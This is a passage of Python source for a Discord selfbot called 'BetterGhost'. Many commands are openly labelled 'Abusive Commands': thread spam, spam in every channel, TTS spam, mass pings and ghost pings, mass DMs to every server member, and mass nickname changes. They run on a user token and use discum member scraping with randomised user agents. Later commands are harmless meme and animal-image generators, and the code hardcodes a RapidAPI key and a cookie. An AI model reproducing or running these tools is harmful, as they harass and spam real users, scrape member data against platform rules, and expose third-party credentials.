embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="threadspam", description="Spam create threads with a starting message.", usage="threadspam [delay] [amount] [addusers | true/false] [name] [startmessage]", aliases=["spamthreads", "spamcreatethreads"])
async def threadspam(ctx, delay: int, amount: int, addusers: bool, name: str = "BetterGhost best selfbot!", *, startmessage: str):
if __riskmode__:
users = []
try:
await ctx.message.delete()
except:
pass
def createThread(title, channel_id, start_message_id):
return requests.request("post", f"https://discord.com/api/channels/{channel_id}/messages/{start_message_id}/threads", headers={"Authorization": __token__, "Content-Type": "application/json"}, data=json.dumps({"name": title}))
def getUsers(guild, channel):
DiscumClient = discum.Client(token=__token__, user_agent=f"{get_random_user_agent()}")
@DiscumClient.gateway.command
def pingpingbrbr(resp):
guild_id = f'{guild.id}'
channel_id = f'{channel.id}'
if resp.event.ready_supplemental:
DiscumClient.gateway.fetchMembers(guild_id, channel_id, wait=1)
if DiscumClient.gateway.finishedMemberFetching(guild_id):
DiscumClient.gateway.removeCommand(pingpingbrbr)
DiscumClient.gateway.close()
DiscumClient.gateway.run()
members = []
for memberID in DiscumClient.gateway.session.guild(f'{guild.id}').members:
members.append(f"<@!{memberID}>")
return members
async def addUsers(users, channel_id):
try:
requests.post(f"https://discord.com/api/channels/{channel_id}/messages", headers={"Authorization": __token__, "Content-Type": "application/json"}, data=json.dumps({"content": ' '.join(users)}))
except:
pass
if addusers:
print_info("Fetching channel members...")
users = getUsers(ctx.guild, ctx.channel)
await asyncio.sleep(2)
print(users)
await asyncio.sleep(2)
index = 0
if not ctx.author.guild_permissions.administrator:
if amount > 5:
print_info("Limiting amount of threads to 5 to prevent rate limits.")
amount = 5
for _ in range(amount):
index += 1
try:
message = await ctx.send(startmessage + f" {index}")
createThredResponse = createThread(name, ctx.channel.id, message.id)
if addusers:
print_info("Adding users to the thread...")
await addUsers(users, createThredResponse.json()["id"])
print_info("Created a new thread.")
try:
await message.delete()
except:
pass
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="channelspam", description="Spam a message X amount of times in every channel.", usage="channelspam [amount] [delay] [message]", aliases=["sendall", "sendtoallchannels", "msgallchannels", "messageallchannels"])
async def channelspam(ctx, amount:int, *, message:str):
if __riskmode__:
for _ in range(amount):
for channel in ctx.guild.text_channels:
try:
await channel.send(message)
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="spam", description="Spam X amount of times.", usage="spam [amount] [delay] [message]")
async def spam(ctx, amount: int, delay: int, *, message):
if __riskmode__:
global spammingMessages
spammingMessages = True
async def spamMessages():
for _ in range(amount):
if spammingMessages == True:
await ctx.send(message)
await asyncio.sleep(delay)
else:
return
BetterGhost.loop.create_task(spamMessages())
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="stopspam", description="Stop spamming messages.", usage="stopspam")
async def stopspam(ctx):
if __riskmode__:
global spammingMessages
spammingMessages = False
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="ttsspam", description="Spam TTS messages X amount of times.", usage="ttsspam [amount] [delay] [message]", aliases=["texttospeachspam"])
async def ttsspam(ctx, amount: int, delay: int, *, message):
if __riskmode__:
for _ in range(amount):
await ctx.send(message, tts=True)
await asyncio.sleep(delay)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="massghostping", description="Ping a mass amount of people in the command server and delete the messages.", usage="massghostping (amount of messages) (send delay)", aliases=["massghostmention", "theotherfunny"])
async def massghostping(ctx, amount:int=1, delay:int=0):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=0)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
# members = []
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
messages = []
message = ""
# for channel in ctx.guild.text_channels:
# print_info(f"Starting fetch in #{channel.name}.")
# members2 = get_members(str(ctx.guild.id), str(channel.id))
# for member in members2:
# members.append(member)
# print_info(f"Fetched a total of {len(members)} members.")
for member in members:
if len(message) < 1950:
message += f"<@{member}> "
else:
messages.append(message)
message = ""
messages.append(message)
for _ in range(amount):
for message in messages:
try:
await ctx.send(message, delete_after=0)
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="massping", description="Ping a mass amount of people in the command server.", usage="massping (amount of messages) (send delay)", aliases=["massmention", "sigmainstaller", "hahafunny"])
async def massping(ctx, amount:int=1, delay:int=0):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=0)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
messages = []
message = ""
for member in members:
if len(message) < 1950:
message += f"<@{member}> "
else:
messages.append(message)
message = ""
messages.append(message)
for _ in range(amount):
for message in messages:
try:
await ctx.send(message)
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="massdm", description="Send a DM message to everyone in the server.", usage="massdm [delay] [amount] [message]")
@commands.guild_only()
async def massdm(ctx, delay:int=0, amount:int=10, *, message:str):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for _ in range(amount):
for member in members:
try:
member = await BetterGhost.fetch_user(int(member))
await member.send(message)
except:
pass
await asyncio.sleep(delay)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="rickroll", description="Send never gonna give you up lyrics one by one.", usage="rickroll")
async def rickroll(ctx):
global rickRollEnabled
rickRollEnabled = True
async def sendLyrics():
file1 = open('data/rickroll.txt', 'r')
Lines = file1.readlines()
for line in Lines:
if rickRollEnabled == True:
await ctx.send(line)
await asyncio.sleep(1)
else:
return
BetterGhost.loop.create_task(sendLyrics())
@BetterGhost.command(name="stoprickroll", description="Stop sending rick astley lyrics.", usage="stoprickroll")
async def stoprickroll(ctx):
global rickRollEnabled
rickRollEnabled = False
@BetterGhost.command(name="suggest", description="Suggest something.", usage="suggest [suggestion]")
async def suggest(ctx, *, suggestion):
if __embedmode__:
embed = discord.Embed(title="Suggestion", description=suggestion, colour=__embedcolour__)
embed.set_footer(text=ctx.author.name + " suggested.", icon_url=ctx.author.avatar_url)
embed.timestamp = datetime.now()
msg = await ctx.send(embed=embed)
else:
msg = await ctx.send(f"""```ini
[ Suggestion ]
{suggestion}
# {ctx.author.name} suggested.```""", delete_after=__deletetimeout__)
await msg.add_reaction('\U0001F44D')
await msg.add_reaction('\U0001F44E')
@BetterGhost.command(name="massnick", description="Change the nickname of all members in the command server.", usage="massnick [nickname]", aliases=["massnickname", "masschangenickname"])
async def massnick(ctx, *, nickname):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.edit(nick=nickname)
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="massunnick", description="Reset the nickname of all members in the command server.", usage="massunnick", aliases=["massremovenickname", "massunnickname"])
async def massunnick(ctx):
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.edit(nick="")
await asyncio.sleep(1)
except:
pass
@BetterGhost.command(name="dadjoke", description="A random dad joke.", usage="dadjoke")
async def dadjoke(ctx):
url = "https://icanhazdadjoke.com/"
payload={}
headers = {
'Accept': 'text/plain',
'Cookie': '__cfduid=d6dccebb48b09fdeb9a97022fa2f292811612029832'
}
response = requests.request("GET", url, headers=headers, data=payload)
if __embedmode__:
embed = discord.Embed(description=response.text, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(response.text)
@BetterGhost.command(name="randomquestion", description="A random question.", usage="randomquestion", aliases=["ranquestion"])
async def randomquestion(ctx):
question = requests.get("https://nekos.life/api/v2/why").json()["why"]
if __embedmode__:
embed = discord.Embed(description=question, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(question)
@BetterGhost.command(name="randommessage", description="A random message.", usage="randommessage", aliases=["ranmessage"])
async def randommessage(ctx):
url = "https://ajith-messages.p.rapidapi.com/getMsgs"
querystring = {"category":"Random"}
headers = {
'x-rapidapi-key': "01eddf9d3cmsh5207aa226152e38p1f5a60jsn182a112b106d",
'x-rapidapi-host': "ajith-messages.p.rapidapi.com"
}
response = requests.request("GET", url, headers=headers, params=querystring)
response_data = response.json()
if __embedmode__:
embed = discord.Embed(description=response_data["Message"], colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(response_data["Message"])
@BetterGhost.command(name="meme", description="A random meme.", usage="meme", aliases=["randommeme"])
async def meme(ctx):
response = requests.get("https://meme-api.herokuapp.com/gimme")
data = response.json()
if __embedmode__:
embed = discord.Embed(title=data["title"], url=data["postLink"], colour=__embedcolour__)
embed.set_image(url=data["url"])
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_author(name=f"u/{data['author']}", url=f"https://reddit.com/u/{data['author']}")
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(data["title"] + "\n" + data["url"])
@BetterGhost.command(name="gif", description="Search for a gif.", usage="gif [search]", aliases=["searchgif"])
async def gif(ctx, *, search):
if CONFIG["api_keys"]["tenor"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires a tenor API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires a tenor API key.")
else:
search = search.replace(" ", "+")
response = requests.get(f'https://g.tenor.com/v1/search?q={search}&key={CONFIG["api_keys"]["tenor"]}&limit=10000')
data = response.json()
#print(data['results'][0]["media"][0]["gif"]["url"])
if __embedmode__:
embed = discord.Embed(title=f"{search.replace('+', ' ')}", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data['results'][random.randint(0, 49)]["media"][0]["gif"]["url"])
await ctx.send(embed=embed)
else:
await ctx.send(data['results'][random.randint(0, 49)]["media"][0]["gif"]["url"])
@BetterGhost.command(name="cat", description="A random cat image.", usage="cat", aliases=["randomcat"])
async def cat(ctx):
request = requests.get("https://cataas.com/cat?json=true").json()
image = "https://cataas.com" + request["url"]
if __embedmode__:
embed = discord.Embed(title="meow", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=image)
await ctx.send(embed=embed)
else:
await ctx.send(image)
@BetterGhost.command(name="catgif", description="A random cat gif.", usage="catgif", aliases=["randomcatgif"])
async def catgif(ctx):
request = requests.get("https://cataas.com/cat/gif?json=true").json()
image = "https://cataas.com" + request["url"]
if __embedmode__:
embed = discord.Embed(title="meow", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=image)
await ctx.send(embed=embed)
else:
await ctx.send(image)
@BetterGhost.command(name="dog", description="A random dog image.", usage="dog", aliases=["randomdog"])
async def dog(ctx):
response = requests.get('https://dog.ceo/api/breeds/image/random')
data = response.json()
if __embedmode__:
embed = discord.Embed(title="woof", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data['message'])
await ctx.send(embed=embed)
else:
await ctx.send(data['message'])
@BetterGhost.command(name="shiba", description="A random shiba image.", usage="shiba", aliases=["randomshiba"])
async def shiba(ctx):
response = requests.get('https://shibe.online/api/shibes?count=1&httpsUrls=true')
data = response.json()
if __embedmode__:
embed = discord.Embed(title="shiba", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data[0])
await ctx.send(embed=embed)
else:
await ctx.send(data[0])
@BetterGhost.command(name="fox", description="A random fox image. (Thanks Imf44 <3)", usage="fox", aliases=["randomfox"])
async def fox(ctx):
response = requests.get('https://randomfox.ca/floof/')
data = response.json()
if __embedmode__:
embed = discord.Embed(title="fox", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data['image'])
await ctx.send(embed=embed)
else:
await ctx.send(data['message'])
@BetterGhost.command(name="achievement", description="Create a fake minecraft achievement image.", usage='achievement ["text"] (icon)', aliases=["minecraftachievement"])
async def achievement(ctx, text, icon=10):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
icon = str(icon)
text = text.replace(" ", "+")
image = requests.get(f"https://api.alexflipnote.dev/achievement?text={text}&icon={icon}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="challenge", description="Create a fake minecraft challenge image.", usage='challenge ["text"] (icon)', aliases=["minecraftchallenge"])
async def challenge(ctx, text, icon=33):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
text = text.replace(" ", "+")
image = requests.get(f"https://api.alexflipnote.dev/challenge?text={text}&icon={icon}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="captcha", description="Create a fake reCaptcha.", usage="captcha [text]", aliases=["fakecaptcha"])
async def captcha(ctx, *, text):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
text = text.replace(" ", "+")
image = requests.get(f"https://api.alexflipnote.dev/captcha?text={text}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="amiajoke", description="Make a user a joke.", usage="amiajoke [@user]", aliases=["amiajoketoyou"])
async def amiajoke(ctx, user:discord.User):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
imageurl = avatarUrl(user.id, user.avatar)
image = requests.get(f"https://api.alexflipnote.dev/amiajoke?image={imageurl}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="didyoumean", description="Create a google did you mean image.", usage='didyoumean ["text 1"] ["text 2"]', aliases=["googledidyoumean"])
async def didyoumean(ctx, text1="Nighty", text2="BetterGhost"):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
text1 = text1.replace(" ", "+")
text2 = text2.replace(" ", "+")
image = requests.get(f"https://api.alexflipnote.dev/didyoumean?top={text1}&bottom={text2}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="drake", description="Create a drake meme image.", usage='drake ["text 1"] ["text 2"]', aliases=["drakememe"])
async def drake(ctx, text1="Nighty Selfbot", text2="BetterGhost Selfbot"):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
text1 = text1.replace(" ", "+")
text2 = text2.replace(" ", "+")
image = requests.get(f"https://api.alexflipnote.dev/drake?top={text1}&bottom={text2}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="facts", description="Create a facts meme image.", usage='facts [text]', aliases=["factsmeme"])
async def facts(ctx, *, text):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
text = text.replace(" ", "+")
image = requests.get(f"https://api.alexflipnote.dev/drake?text={text}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="jokeoverhead", description="Create a joke over head image.", usage="jokeoverhead [image url]")
async def jokeoverhead(ctx, *, imageurl):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
image = requests.get(f"https://api.alexflipnote.dev/jokeoverhead?image={imageurl}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="pornhub", description="Create a pornhub logo image.", usage='pornhub ["text 1"] ["text 2"]')
async def pornhub(ctx, text1="BetterGhost", text2="Selfbot"):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
text1 = text1.replace(" ", "+")
text2 = text2.replace(" ", "+")
image = requests.get(f"https://api.alexflipnote.dev/pornhub?text={text1}&text2={text2}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="salty", description="Make someone salty.", usage="salty [@user]")
async def jokeoverhead(ctx, user:discord.User):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
